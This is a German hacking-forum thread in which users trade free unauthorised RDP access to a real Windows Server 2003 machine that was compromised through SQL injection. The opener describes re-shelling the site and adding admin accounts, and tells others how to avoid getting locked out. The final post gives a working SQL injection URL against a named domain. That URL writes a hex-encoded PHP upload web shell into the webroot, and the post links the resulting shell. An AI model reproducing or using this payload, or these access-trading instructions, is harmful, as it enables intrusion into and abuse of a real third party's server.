Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

1x Free Rdp - "Hammer" Anbindung

- - - - -
Erstellt von NichtDiePolizei ,


  • Bitte melde dich an um zu Antworten
6 Antworten in diesem Thema

#1
NichtDiePolizei
Geschrieben 10 February 2017 - 08:41 Uhr

NichtDiePolizei

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    44
  • 58 Beiträge
  • 59 Bedankt
  • Android, Android [root], Blackberry
  • Linux

Durch ne Sqli bekommen.

Macht damit was ihr wollt.

Habe den User selbst angelegt, ansonsten einfach Site neu shellen und neuen Admin adden.

 

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

User: Administrato

Rechte: Administrator

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

 

6040860196.png


  • Born2Hack, devmonkey und zlay gefällt das
Thanked by 12 Members:
parisdefr , xoro , zlay , shiznith , mettbrot , Born2Hack , leonalexkraus , SecurityFlaw , Platin , hacked , mantwohouse , devmonkey

#2
devmonkey
Geschrieben 10 February 2017 - 09:00 Uhr

devmonkey

    Noob

  • Members
  • PIPPIP
    • Likes
    0
  • 5 Beiträge
  • 0 Bedankt

Danke habe ich mir genommen :)

 


#3
NichtDiePolizei
Geschrieben 10 February 2017 - 09:09 Uhr

NichtDiePolizei

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    44
  • 58 Beiträge
  • 59 Bedankt
  • Android, Android [root], Blackberry
  • Linux

Schön. Nichts changen oder deaktivieren, nur portable Apps nutzen und immer Incognito surfen und es wird auch nicht so schnell gesperrt.


#4
devmonkey
Geschrieben 10 February 2017 - 09:14 Uhr

devmonkey

    Noob

  • Members
  • PIPPIP
    • Likes
    0
  • 5 Beiträge
  • 0 Bedankt

ich weiss ich weiss :) trotzdem danke ...dann muss ich nicht scannen :P


#5
SecurityFlaw
Geschrieben 11 February 2017 - 16:17 Uhr

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
    • Likes
    213
  • 256 Beiträge
  • 114 Bedankt
  • Android, Android [root]
  • Windows, Linux

Komme nicht rauf, check das bitte mal.


#6
NichtDiePolizei
Geschrieben 12 February 2017 - 00:52 Uhr

NichtDiePolizei

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    44
  • 58 Beiträge
  • 59 Bedankt
  • Android, Android [root], Blackberry
  • Linux

Komme nicht rauf, check das bitte mal.

Ich nehme mal an das der Login geändert wurde. Entweder von @devmonkey oder dem Server Admin. Wie ich in meinem Startpost geschrieben habe kann man die Seite jederzeit problemlos erneut shellen. Also oben angegebene IP resolven, SQLI auf der Seite finden und shellen. Dann kannst du bei Bedarf nen neuen User anlegen. Ist nen Windows Server 2003.


Thanked by 1 Member:
SecurityFlaw

#7
SecurityFlaw
Geschrieben 12 February 2017 - 16:32 Uhr

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
    • Likes
    213
  • 256 Beiträge
  • 114 Bedankt
  • Android, Android [root]
  • Windows, Linux

SQLI:

http://www.keikong.com/news.php?id=-1 UNION SELECT 1,2,3,4,0x3c666f726d20656e63747970653d276d756c7469706172742f666f726d2d646174612720616374696f6e3d273c3f706870206563686f2022687474703a2f2f22202e20245f5345525645525b22485454505f484f5354225d202e20245f5345525645525b22524551554553545f555249225d3b203f3e27206d6574686f643d27504f5354273e53656c6563742066696c6520746f2075706c6f61643a203c696e707574206e616d653d277573657266696c652720747970653d2766696c65273e3c696e70757420747970653d277375626d6974272076616c75653d2753656e64273e3c2f666f726d3e3c3f70687020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b227573657266696c65225d5b22746d705f6e616d65225d2c20245f46494c45535b227573657266696c65225d5b226e616d65225d293b203f3e,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 INTO OUTFILE 'D:/xampp/htdocs/upload.php' FROM qbteigze_qigang.web_admin -- -&page=1

Shell:

http://www.keikong.com/upload.php

Bearbeitet von SecurityFlaw, 14 February 2017 - 02:32 Uhr.

Zurück zu  Sonstige Trades

  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 58 Mitglied(ern) gelesen


    3eyes, 4URovu4, baba yugo, Bad Grandpa, Bloodman, Boneau, Born2Hack, Bot4ng, deathfafara, devmonkey, dos, Dr. Spic, dvalar, exploitablerootkit, FatalityMods, fluffybunny, Framerater, G4miT, Giganet, gutzuu, hacke2010, hacked, Haxlor, Husti_nett, ItsDezzen, Jack_Frost, Jackdaniels, Juri, keyb0ardz, kiwitone, leonalexkraus, loken, lolorollo, loziov1, mantwohouse, mettbrot, MrZitrus, nibble nibble, NichtDiePolizei, PadX18, Platin, Psykoon303, raakil, raider, rat123, SecurityFlaw, shiznith, SK4LL3R, smc2014, Smn, Stanley, Theman, Toskom4n, Xenos88, xoro, xVirtu, zlay, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz